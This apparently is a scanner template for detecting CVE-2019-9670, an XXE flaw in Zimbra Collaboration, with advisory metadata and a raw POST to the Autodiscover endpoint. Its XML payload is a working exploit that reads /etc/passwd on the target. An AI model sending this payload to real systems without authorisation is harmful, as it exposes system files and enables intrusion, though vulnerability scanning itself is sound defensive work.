id: CVE-2019-9670

info:
  name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
  author: ree4pwn
  severity: critical
  description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
  reference:
    - https://www.exploit-db.com/exploits/46693/
    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
    - https://bugzilla.zimbra.com/show_bug.cgi?id=109129
    - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
    - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
    - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9670
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9670
    cwe-id: CWE-611
  tags: cve,cve2019,zimbra,xxe

requests:
  - raw:
      - |
        POST /Autodiscover/Autodiscover.xml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <!DOCTYPE xxe [
        <!ELEMENT name ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
        <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
        <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
        </Request>
        </Autodiscover>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
          - "Problem accessing"
        condition: and

      - type: status
        status:
          - 503

# Enhanced by mp on 2022/05/03